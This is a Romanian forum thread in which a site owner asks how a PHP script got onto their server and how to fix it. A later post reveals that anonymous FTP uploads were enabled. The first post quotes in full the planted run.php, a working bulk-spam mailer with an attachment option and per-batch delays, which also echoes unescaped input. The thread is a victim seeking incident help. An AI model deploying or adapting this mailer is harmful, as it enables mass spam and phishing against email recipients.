Jump to content
robertutzu

Site vulnerabil?!

Recommended Posts

Posted (edited)

Deci am un site facut simplu html si un formular .php. Astazi cumva, nustiu cum, vad asa ceva:

Edit: nu am nici un form de upload imagini!

Script uploaded:

/public_html/images/run.php:235:

/public_html/images/run.php:236:

/public_html/images/run.php:237:

Intrebare:

Cum a reusit sa urce acel script php si ce pot face sa remediez aceasta problema sau de la ce poate fi?

Cand ma uit sa vad ce facea scriptu hop na, trimitea spam, asta e scriptu:

<DIV id=""></DIV></DIV></BODY></HTML>
<BODY><A href=""><FONT size="5"><STRONG>BEST SPAM TOOLS</STRONG></FONT></A><FONT size="5"><STRONG> 
FRESH TOOLS GOOD PRICE</STRONG></FONT> </BODY></HTML>
<?
function doset() {
set_time_limit(200000);
ini_set("memory_limit", "256M");
ignore_user_abort(true);
}
doset();


if ($_POST['action']=="send"){

$message = urlencode($_POST['message']);

$message = ereg_replace("%5C%22", "%22", $message);

$message = urldecode($message);
$message = stripslashes($message);
$subject = stripslashes($_POST['subject']);

}
?>

<form name="form" method="post" action="run.php" enctype="multipart/form-data">

<br>

<table width="100%" border="0">

<tr>

<td width="10%">

<div align="right"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">Your

Email:</font></div>

</td>

<td width="18%"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">

<input type="text" name="from" value="<? print $_POST['from']; ?>" size="30">

</font></td>

<td width="31%">

<div align="right"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">Name:</font></div>

</td>

<td width="41%"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">

<input type="text" name="realname" value="<? print $_POST['realname']; ?>" size="30">

</font></td>

</tr>

<tr>

<td width="10%">

<div align="right"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">Reply-To:</font></div>

</td>

<td width="18%"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">

<input type="text" name="replyto" value="<? print $_POST['replyto']; ?>" size="30">

</font></td>

<td width="31%">

<div align="right"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">Attach File:</font></div>

</td>

<td width="41%"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">

<input type="file" name="file" size="30">

</font></td>

</tr>

<tr>

<td width="10%">

<div align="right"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">Subject:</font></div>

</td>

<td colspan="3"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">

<input type="text" name="subject" value="<? print stripslashes($_POST['subject']); ?>" size="90">

</font></td>

</tr>

<tr valign="top">

<td colspan="3"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">

<textarea name="message" cols="60" rows="10"><? print stripslashes($_POST['message']); ?></textarea>

<br>

<input type="radio" name="contenttype" value="plain">

Plain Text

<input type="radio" name="contenttype" value="html" checked>

HTML

<input type="hidden" name="action" value="send">

<input type="submit" value="Send Message">

</font></td>

<td width="41%"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">

<textarea name="emaillist" cols="30" rows="10"></textarea>

<br>
<input type="text" name="emailfinal" value="<? print $_POST['emailfinal']; ?>" size="22"> (EMAIL TEST)
</font></td>
</tr>
</table>
<p>For each <input type="text" name="emailz" value="<? print $_POST['emailz']; ?>" size="3"> email, wait <input type="text" name="wait" value="<? print $_POST['wait']; ?>" size="3"> second<br></p>
</form>



<?

if ($_POST['action']=="send"){
$message = urlencode($_POST['message']);

$message = ereg_replace("%5C%22", "%22", $message);

$message = urldecode($message);
$message = stripslashes($message);
$subject = stripslashes($_POST['subject']);


$from=$_POST['from'];
$realname=$_POST['realname'];
$replyto=$_POST['replyto'];


$emaillist=$_POST['emaillist'];
if( strpos($_POST['emailfinal'], "@") !== false)
$emaillist .= "\n". $_POST['emailfinal'];
$contenttype=$_POST['contenttype'];


$allemails = split("\n", $emaillist);

$numemails = count($allemails);



#Open the file attachment if any, and base64_encode it for email transport

If ($file_name){

@copy($file, "./$file_name") or die("The file you are trying to upload couldn't be copied to the server");

$content = fread(fopen($file,"r"),filesize($file));

$content = chunk_split(base64_encode($content));

$uid = strtoupper(md5(uniqid(time())));

$name = basename($file);

}



for($x=0; $x<$numemails; $x++){

if($_POST['emailz'] && $_POST['wait'])
if( fmod($x,$emailz) == 0 ) {
echo "-------------------------------> I send email $x,I wait $wait seconds.<br>";
sleep($wait);
}
$to = $allemails[$x];

if ($to){

$to = ereg_replace(" ", "", $to);

$message = ereg_replace("&email&", $to, $message);

$subject = ereg_replace("&email&", $to, $subject);

print "Sending mail to $to.......";

flush();

$header = "From: $realname <$from>\r\nReply-To: $replyto\r\n";

$header .= "MIME-Version: 1.0\r\n";

If ($file_name) $header .= "Content-Type: multipart/mixed; boundary=$uid\r\n";

If ($file_name) $header .= "--$uid\r\n";

$header .= "Content-Type: text/$contenttype\r\n";

$header .= "Content-Transfer-Encoding: 8bit\r\n\r\n";

$header .= "$message\r\n";

If ($file_name) $header .= "--$uid\r\n";

If ($file_name) $header .= "Content-Type: $file_type; name=\"$file_name\"\r\n";

If ($file_name) $header .= "Content-Transfer-Encoding: base64\r\n";

If ($file_name) $header .= "Content-Disposition: attachment; filename=\"$file_name\"\r\n\r\n";

If ($file_name) $header .= "$content\r\n";

If ($file_name) $header .= "--$uid--";

mail($to, $subject, "", $header);

print " SEND<br>";

flush();

}

}



}


?>
<strong><br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
Created by:</strong> <span class="style1"> .</span>
<br>
<span class="style5">My Email : <br>
<span class="style5">oR: ... <br>
</span>

</body>
</html>

Edited by robertutzu
Posted

la whm am deny la orice ip doar ip meu static are acces, stealer cam improbabil, bruteforce nici atat am cphulk enabled,

Conectarea e pe :2087 pe https

La ftp server aveam astea pe yes

Allow Anonymous Uploads YES (acum am pus pe NO)

Allow Anonymous Logins YES(acum am pus pe NO)

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...